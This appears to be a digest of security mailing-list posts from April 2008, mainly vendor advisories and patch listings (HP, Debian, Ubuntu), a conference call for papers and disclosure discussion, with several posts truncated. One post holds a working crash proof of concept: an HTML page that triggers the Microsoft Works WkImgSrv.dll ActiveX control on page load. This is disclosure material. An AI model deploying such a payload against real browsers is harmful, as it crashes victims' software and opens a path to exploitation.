Linux BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2005-3352 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2005-3357 (AV:N/AC:H/Au:N/C:N/I:N/A:C) 5.4 CVE-2006-3747 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002. RESOLUTION HP has made the following software patches available to resolve the vulnerabilities. These patches are available on: http://itrc.hp.com OV NNM v7.51 HP-UX (IA) -- PHSS_36386 or subsequent HP-UX (PA) -- PHSS_36385 or subsequent Solaris -- PSOV_03479 or subsequent Linux RedHatAS2.1 -- LXOV_00052 or subsequent OV NNM v7.01 HP-UX (PA) -- PHSS_36773 or subsequent Solaris -- PSOV_03480 or subsequent OV NNM v6.41 HP-UX (PA) -- PHSS_37141 or subsequent Solaris -- PSOV_03489 or subsequent MANUAL ACTIONS: No PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS (for HP-UX) For HP-UX OV NNM 7.51 HP-UX B.11.31 HP-UX B.11.23 (IA) = OVNNMgr.OVNNM-RUN action: install PHSS_36386 or subsequent URL: http://itrc.hp.com HP-UX B.11.23 (PA) HP-UX B.11.11 HP-UX B.11.00 = OVNNMgr.OVNNM-RUN action: install PHSS_36385 or subsequent URL: http://itrc.hp.com For HP-UX OV NNM 7.01 HP-UX B.11.00 HP-UX B.11.11 = OVNNMgr.OVNNM-RUN action: install PHSS_36773 or subsequent URL: http://itrc.hp.com For HP-UX OV NNM 6.41 HP-UX B.11.00 HP-UX B.11.11 = OVNNMgr.OVNNM-RUN action: install PHSS_37141 or subsequent URL: http://itrc.hp.com END AFFECTED VERSIONS (for HP-UX) HISTORY Version: 1 (rev.1) - 15 April 2008 Initial release Version: 2 (rev.2) - 17 April 2008 Remove Windows patches Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED] It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: [EMAIL PROTECTED] Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NAlangcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save. To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections. To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do * The Software Product Category that this Security Bulletin relates
Microsoft Works 7 WkImgSrv.dll crash POC
DLL VERSION 7.03.0616.0 TEST ON IE7+XPSP2_CN MYBLOG:http://hi.baidu.com/nansec/ 0DAY? I don't know. POC: html head titleMicrosoft Works 7 WkImgSrv.dll crash POC/title script language=JavaScript function payload() { var num = -1; obj.WksPictureInterface = num; } /script /head body onload=JavaScript: return payload(); object classid=clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 id=obj /object /body /html
Announcement - DeepSec Conference 2008, Nov 11-14 2008
== Announcement and 1st Call for Papers == We are happy to invite you to the second DeepSec In-Depth Security Conference from November 11th to 14th at the Imperial Riding School Renaissance Hotel in Vienna. Pre-registration for conference guests and the call for papers website will be open from April 16th 2008 on https://deepsec.net/. The In-Depth security conference will include two days of security talks during the conference and two days of trainings, covering the latest topics in network and IT security. There will be also a comprehensive social program around the event. We're inviting you to submit proposals for trainings and conference talks. All proposals received before July 15th 2008, 23:59 CET will be considered by the program committee. == Topics == We are interested in bleeding edge security research directly from leading researchers, professionals, academics, industry, government and the underground security community. Please do not submit specific single expoits (which might be fixed by the time of the conference) and yet-another-PHP-hack or the like. Exploit frameworks, general approaches, defective by design resp. defective by implementation and high impact exploits have a much higher chance ;) Topics of special interest include: * OS Security (XP, Vista, GNU/Linux, OS X, ...) * E/I-Voting Case-Studies, Attacks, Weaknesses * Mobile and PAN Security * Network Protocol Analysis * AJAX/Web2.0/Javascript Security * Secure Software Development * VoIP * Perimeter Defense / Firewall Technology * Digital Forensics * WLAN/WiFi, GPRS and 3G Security * IPv6 * Smart Card Security * Cryptography * Intrusion Detection * Incident Response * Rootkit Detection, Techniques, and Defense * Security Properties of Web-Frameworks * Malicious Code Analysis * Secure Framework Design * .NET and Java Security * Security Management Please note, that we are a non-product, non-vendor biased security conference and do not welcome vendor pitches in the conference talks or trainings. We will provide an opportunity for vendor self presentation through sponsorship and vendor booths in the conference lounge, where coffee and snacks will be served during the breaks. == Submission == Proposals for talks and trainings at the second annual DeepSec In-Depth Security Conference will be accepted until July 15th 2008, 23:59 CEST. All proposals should be submitted through our web site https://deepsec.net/cfp/ or by email to: [EMAIL PROTECTED] == About DeepSec == DeepSec IDSC is an annual European two-day in-depth conference on computer, network, and application security. The DeepSec Conference will be held from November 11th to 14th 2008 in Vienna, and aims to bring together the world's leading security professionals from academics, government, industry, and the underground hacking community. In addition to the conference with 32 sessions we will offer between 4 and 6 two-day intense security training courses before the main conference. The conference program will be augmented with a live hacking competition and a team capture the flag contest. DeepSec is a non-product, non-vendor-biased conference. Our aim is to present the best research and experience from the fields' leading experts. Target Audience: Security Officers, Security Professionals and Product Vendors, IT Decision Makers, Policy Makers, Security-, Network-, and Firewall Administrators, Teachers, Academic Researchers and Software Developers. The last conference has been attended by: Ericsson, Commerzbank, Philips, RBT, GRZ IT, IERN Sierra Leone, SAP, Improware, Telekom Austria, Microsoft, BAWAG, T-Systems, Iphos, Sektion Eins, T-Mobile, Red Hat, SWITCH, Austrian National Bank, Daimler, Sentrigo, University of Vienna, SEC Consult, Tech Data, S21Sec, DHL, Bearing Point, Cygnos, wecon, YCO, and many others. == Speakers/Trainers == Speaker privileges include: * One economy class return-ticket to Vienna. * 3 nights of accomodation in the Conference Hotel. * Breakfast, lunch, and two coffee breaks * Speaker activities during, before, and after the conference. * Speaker After-Party in the Metalab Hackerspace on November 14th. Instructor privileges include: * 50% of the net profit of the class. * 2 nights of accommodation in the conference hotel during the trainings. * Breakfast, lunch, and two coffee breaks. * Free speaker ticket for the conference. * Speaker activities during, before, and after the conference. * Speaker After-Party in the Metalab Hackerspace on November 14th If you have questions, want to send us additional material, or have problems with the web form, feel free to contact us at: [EMAIL PROTECTED] Best regards, DeepSec In-Depth Security Conference organisation team: Michael Kafka, DeepSec GmbH René Pfeiffer, DeepSec GmbH Initiated by Paul Böhm, DeepSec GmbH
[SECURITY] [DSA 1548-1] New xpdf packages fix arbitrary code exitution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1548-1 [EMAIL PROTECTED] http://www.debian.org/security/ Devin Carraway April 17, 2008http://www.debian.org/security/faq - Package: xpdf Vulnerability : multiple Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-1693 Kees Cook discovered a vulnerability in xpdf, set set of tools for display and conversion of Portable Document Format (PDF) files. The Common Vulnerabilities and Exposures project identifies the following problem: CVE-2008-1693 Xpdf's handling of embedded fonts lacks sufficient validation and type checking. If a maliciously-crafted PDF file is opened, the vulnerability may allow the execution of arbitrary code with the privileges of the user running xpdf. For the stable distribution (etch), these problems have been fixed in version 3.01-9.1+etch3. For the unstable distribution (sid), these problems were fixed in version 3.02-1.2. We recommend that you upgrade your xpdf package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390. Source archives: http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch4.dsc Size/MD5 checksum: 974 b5ae1ed7abc02a808b97f9e8b1c08e6d http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch4.diff.gz Size/MD5 checksum:39829 8b0fe2c7568c3f82d6b3d5d4742b52d9 http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01.orig.tar.gz Size/MD5 checksum: 599778 e004c69c7dddef165d768b1362b44268 Architecture independent packages: http://security.debian.org/pool/updates/main/x/xpdf/xpdf_3.01-9.1+etch4_all.deb Size/MD5 checksum: 1274 e7fcf339747f547b7519cbd1df2f9338 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-common_3.01-9.1+etch4_all.deb Size/MD5 checksum:61358 7a76c4dc0a5eeb0b71fbc2807fc8ad21 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_alpha.deb Size/MD5 checksum: 915780 40c67cd9c1b54b2f61e783df57b9f1b0 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_alpha.deb Size/MD5 checksum: 1675464 0ec4308b0a7a6a9281b436b536c2b4a4 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_amd64.deb Size/MD5 checksum: 1480468 cc550f3994bdab8fd1534d0c00111723 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_amd64.deb Size/MD5 checksum: 804240 cca7233b1fe75ed2772af5d2f8e6d49d arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_arm.deb Size/MD5 checksum: 1458046 46b5a1a1503ad522b310ecbb8ce64bcc http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_arm.deb Size/MD5 checksum: 799814 97e080dec03c0393d8fee63e1a005f1d hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_hppa.deb Size/MD5 checksum: 1765316 5c465e20d6a5b285da773eda66c7497c http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_hppa.deb Size/MD5 checksum: 959886 5a5192fc84768372b5370464d646bc64 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_i386.deb Size/MD5 checksum: 793560 5c6a968f356623a7db8c1b88e8ef40c4 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_i386.deb Size/MD5 checksum: 1450746 701944ba02dbe4dd852bd22bb0ca3ab2 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-reader_3.01-9.1+etch4_ia64.deb Size/MD5 checksum: 1212440 256c451d95495fa2689d1cca4c98e7e5 http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_ia64.deb Size/MD5 checksum: 2203266 f73f1d87341e34c9f405c2c75b6f459d mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/x/xpdf/xpdf-utils_3.01-9.1+etch4_mips.deb Size/MD5 checksum: 1730844 fbc5b43b2558c59e6a2d6630d1371a88
[USN-603-1] poppler vulnerability
=== Ubuntu Security Notice USN-603-1 April 17, 2008 poppler vulnerability CVE-2008-1693 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libpoppler1 0.5.1-0ubuntu7.4 Ubuntu 6.10: libpoppler1 0.5.4-0ubuntu4.4 Ubuntu 7.04: libpoppler1 0.5.4-0ubuntu8.3 Ubuntu 7.10: libpoppler2 0.6-0ubuntu2.2 After a standard system upgrade you need to restart your session to effect the necessary changes. Details follow: It was discovered that the poppler PDF library did not correctly handle certain malformed embedded fonts. If a user or an automated system were tricked into opening a malicious PDF, a remote attacker could execute arbitrary code with user privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1-0ubuntu7.4.diff.gz Size/MD5:14505 84fd76e862be522d0ae367a52abd33e1 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1-0ubuntu7.4.dsc Size/MD5: 1726 765b81a26a13a0b86189f1741bedc125 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler_0.5.1.orig.tar.gz Size/MD5: 954930 a136cd731892f4570933034ba97c8704 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.4_amd64.deb Size/MD5: 725860 3186b3be16d84ee4852cb3fa0dc816bd http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.4_amd64.deb Size/MD5:57468 45f93de6a0eccd784ceaec18ae06800b http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.4_amd64.deb Size/MD5:46628 276bec9301d94f51100f861d87ee9368 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.4_amd64.deb Size/MD5:52218 a3bf5c90d6374ba96725c3646936dcd4 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.4_amd64.deb Size/MD5:42840 97263411c74db409398706df7809e0a2 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.4_amd64.deb Size/MD5: 542704 e786a2f56a807450f470074952cdf98e http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.5.1-0ubuntu7.4_amd64.deb Size/MD5: 100484 b3a34e3085f3356f210970289cdd218e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.4_i386.deb Size/MD5: 656998 44c7f448a947fb567c8aec573b48e903 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.4_i386.deb Size/MD5:54156 17c718dedd5812edd7387116f2bca6e8 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.4_i386.deb Size/MD5:44642 6e16f26542f466d19a8145652f011f29 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.4_i386.deb Size/MD5:50146 751ba6a2f6122282efc3649d65a9e044 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.4_i386.deb Size/MD5:41826 5b83c23615544d5fec7cd43239624836 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.4_i386.deb Size/MD5: 501222 d395b11a2ce07e85fd6d605cf936b3f3 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/poppler-utils_0.5.1-0ubuntu7.4_i386.deb Size/MD5:93518 a74337db902f1f3866d0cd004264e8c3 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-dev_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5: 765856 0b60767804ad72423c5c965f6e15da1b http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-glib-dev_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5:59494 f51670118a9c07cc741472507dbd74d6 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler-qt-dev_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5:46778 48d52e14fab87d61a800ed4c62363c60 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-glib_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5:53508 ae03e9dfffa5cf70343d91ec23c54f07 http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1-qt_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5:44116 ec89ba959c30f63d7c7eb86130a392bc http://security.ubuntu.com/ubuntu/pool/main/p/poppler/libpoppler1_0.5.1-0ubuntu7.4_powerpc.deb Size/MD5: 548978
[USN-603-2] KOffice vulnerability
=== Ubuntu Security Notice USN-603-2 April 17, 2008 koffice vulnerability CVE-2008-1693 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: kword 1:1.5.0-0ubuntu9.4 Ubuntu 6.10: kword 1:1.5.2-0ubuntu2.4 Ubuntu 7.04: kword 1:1.6.2-0ubuntu1.3 Ubuntu 7.10: kword 1:1.6.3-0ubuntu5.2 After a standard system upgrade you need to restart KWord to effect the necessary changes. Details follow: USN-603-1 fixed vulnerabilities in poppler. This update provides the corresponding updates for KWord, part of KOffice. Original advisory details: It was discovered that the poppler PDF library did not correctly handle certain malformed embedded fonts. If a user or an automated system were tricked into opening a malicious PDF, a remote attacker could execute arbitrary code with user privileges. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice_1.5.0-0ubuntu9.4.diff.gz Size/MD5: 307470 d94b54a03a1372215bd57d6ce7dee4e0 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice_1.5.0-0ubuntu9.4.dsc Size/MD5: 1446 816cc85c9ea49d858880a18e4c3bd950 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice_1.5.0.orig.tar.gz Size/MD5: 41765094 096962d7a25ec9063510b9340f18f152 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kivio-data_1.5.0-0ubuntu9.4_all.deb Size/MD5: 682226 9f775bb5977ce0b172ab8bcc7745d4c2 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-data_1.5.0-0ubuntu9.4_all.deb Size/MD5: 748010 af8d6f62ed24be20d7eaea01d468730c http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-doc-html_1.5.0-0ubuntu9.4_all.deb Size/MD5: 464860 bbaaf1edaaa1b8acbf9481aae64529ea http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-doc_1.5.0-0ubuntu9.4_all.deb Size/MD5: 88067296 ca17a24fac6d1744c365cc1a77130458 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice_1.5.0-0ubuntu9.4_all.deb Size/MD5:24528 77ce8b59cea0b5e37d071d61de82790a http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kpresenter-data_1.5.0-0ubuntu9.4_all.deb Size/MD5: 1893964 0f7d293b281912da92b65ed2393b931d http://security.ubuntu.com/ubuntu/pool/main/k/koffice/krita-data_1.5.0-0ubuntu9.4_all.deb Size/MD5: 9817230 10aa97ffb68958eee05c629e777573c4 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kword-data_1.5.0-0ubuntu9.4_all.deb Size/MD5: 1590390 060631dcdb7ad422343dd9a242ff1050 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/k/koffice/karbon_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 1053188 03b785a73ba2b246d46b360b110fe4b2 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kchart_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 1305298 ed2c64fd5c6b1a19e534cbbb959acd60 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kexi_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 3097886 bf666bb5a55dae2e2cd7136af95a3235 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kformula_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 419852 07ed347028abb8e0d4ac0e9070f57e09 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kivio_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 609782 0f3eb7b3006d6a2e30c30b2e47ac8446 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-dbg_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 52561724 6742354db506a2ddb4d68390871ece58 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-dev_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 360746 9e358005e268d73397f9e868c4d1a005 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koffice-libs_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 2565610 5f38280d15a79938eb92753be65c7ebd http://security.ubuntu.com/ubuntu/pool/main/k/koffice/koshell_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 201612 29d13ba2670583f45c513c6d6692d3ce http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kpresenter_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 1415384 a9b61b578c7892bce9502f39423ef16a http://security.ubuntu.com/ubuntu/pool/main/k/koffice/krita_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 2914648 42877e5bdc2b8f52dec099dfafbfc5a2 http://security.ubuntu.com/ubuntu/pool/main/k/koffice/kspread_1.5.0-0ubuntu9.4_amd64.deb Size/MD5: 2460836 5e61f230bdeea6527b82c871045256db
Re: BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
Hello guys, just wanted to let you know that the BigAnt exploit posted on securityfocus at http://www.securityfocus.com/bid/28795 on Apr 15th 2008 and at http://www.milw0rm.org/exploits/5451 was reposted the same day on bugtraq by some really stupid guy who changed my references with some porn site!! I'm not going to repost those links because I don't want to give to him free advertising. Just wanted to let you know that I'm not involved in that stuff. Thx for your attention, Matteo Memelli (ryujin)
[SECURITY] [DSA 1549-1] New clamav packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1549-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 17, 2008http://www.debian.org/security/faq - Package: clamav Vulnerability : buffer overflows Problem type : remotee Debian-specific: no CVE Id(s) : CVE-2008-0314 CVE-2008-1100 Several remote vulnerabilities have been discovered in the Clam anti-virus toolkit. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0314 Damian Put discovered that a buffer overflow in the handler for PeSpin binaries may lead to the execution of arbitrary code. CVE-2008-1100 Alin Rad Pop discovered that a buffer overflow in the handler for Upack PE binaries may lead to the execution of arbitrary code. no CVE yet Damian Put and Thomas Pollet discovered that a buffer overflow in the handler for WWPack-compressed PE binaries may lead to the execution of arbitrary code. For the stable distribution (etch) these problems have been fixed in version 0.90.1-3etch11. For the unstable distribution (sid) these problems have been fixed in version 0.92.1~dfsg2-1 We recommend that you upgrade your clamav packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc and s390. Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg.orig.tar.gz Size/MD5 checksum: 11610428 6dc18602b0aa653924d47316f9411e49 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-3etch11.diff.gz Size/MD5 checksum: 20 c0cad053803837532517aee6ecaa4c09 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-3etch11.dsc Size/MD5 checksum: 900 03248d62d3abe0eeb38db9120e0930c5 Architecture independent packages: http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.90.1dfsg-3etch11_all.deb Size/MD5 checksum: 158166 d4a39b4d4759fb639e937f33f109d7a9 http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.90.1dfsg-3etch11_all.deb Size/MD5 checksum: 201930 d23f3dafd754eec49e1e4207b47903c0 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.90.1dfsg-3etch11_all.deb Size/MD5 checksum: 1005212 91688a455e07d61916bf4598176488e9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 372564 3b909af9a8cd3f1e77d4d5d6fbd947e3 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 861998 0484d2bbe45b71d63e76b86459b3b17b http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 9304930 3f34b1990a2899bb55cfa43037d8868a http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 182414 4ac46cfda39f5217b4ccb7c95f5b3524 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 597274 74dd12051e484483bd9630b807a0f5f1 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 464958 cbaa566557a92c3ad85f36f88d4de47d http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-3etch11_alpha.deb Size/MD5 checksum: 180606 16b631abb2dfd7dc72fb97fb86a9d422 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-3etch11_amd64.deb Size/MD5 checksum: 354764 e6eddaf706aa6ca07d8a72cc6989912c http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-3etch11_amd64.deb Size/MD5 checksum: 856390 40166ed480016a45e9be3f0da3395777 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-3etch11_amd64.deb Size/MD5 checksum: 9301588 35519473079304e22519e792d82e1289 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-3etch11_amd64.deb Size/MD5 checksum: 593128 c7c4b03fbfa9175fef55891ab3aa5c19
Re: [Full-disclosure] Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows
When examining advisory SA28209 http://secunia.com/advisories/28209/ it points to reports listing vulnerabilities in several products and versions (Verity KeyView Viewer SDK 7.x, 8.x, and 9.x) etc. Secunia's Web site lists advisories by a specific product too, see http://secunia.com/product/5570/?task=advisories I believe this is the reason of several advisories. Juha-Matti Erik Harrison [EMAIL PROTECTED] wrote: Its not always easy to know what libs all of your apps are using. Unless of course you're managing a small set of systems, have a lot of time, or are particularly godlike at what you do. I think it's great that they identify the software using it. Frankly, if I'm in an enterprise environment running Lotus for some god awful reason, that's going to get my attention more than one of its libraries. Yes, it does inflate their stats on number of vuln advisories published in a year, but whatever - I don't care about that. What's the better way to deal with it? Try and push one advisory listing 1000 apps affected in its content? Even then, you're not going to have a accurate list. I think it -is- better to publish one advisory per affected piece of software. When I'm skimming the 100 or so that hit my inbox every day, I don't have the luxury of opening each one. Unfortunate, but that's reality of most security staff. It's only going to get worse. Reporting is going to increase and threats are going to apply to far more products inheriting the same code. What's the best, most scalable way of dealing with this? Anyone have any ideas on that one? On Tue, Apr 15, 2008 at 10:20 AM, Luigi Auriemma [EMAIL PROTECTED] wrote: Autonomy Keyview Folio Flat File Parsing Buffer Overflows Autonomy Keyview Applix Graphics Parsing Vulnerabilities Autonomy Keyview EML Reader Buffer Overflows activePDF DocConverter Folio Flat File Parsing Buffer Overflows activePDF DocConverter Applix Graphics Parsing Vulnerabilities Lotus Notes Applix Graphics Parsing Vulnerabilities Lotus Notes Folio Flat File Parsing Buffer Overflows Lotus Notes EML Reader Buffer Overflows Lotus Notes kvdocve.dll Path Processing Buffer Overflow Lotus Notes htmsr.dll Buffer Overflows Symantec Mail Security Folio Flat File Parsing Buffer Overflows Symantec Mail Security Applix Graphics Parsing Vulnerabilities 12 mails for the same library? From what I have understood all the bugs are just in this Autonomy Keyview library so in my opinion reporting the same identical bugs in each software which uses this thirdy part component and additionally without saying that the problem in reality is in the library is wrong and leads to a lot of confusion. It's just like if someone finds a bug in zlib and releases 1 advisories, one for each program in the world which uses the library... the bug is not in these 1 programs but only in zlib. --- Luigi Auriemma http://aluigi.org
[SECURITY] [DSA 1550-1] New suphp packages fix local privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1550-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff April 17, 2008http://www.debian.org/security/faq - Package: suphp Vulnerability : programming error Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-1614 Debian Bug : 475431 It was discovered that suphp, an Apache module to run PHP scripts with owner permissions handles symlinks insecurely, which may lead to privilege escalation by local users. For the stable distribution (etch), this problem has been fixed in version 0.6.2-1+etch0. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your suphp packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer 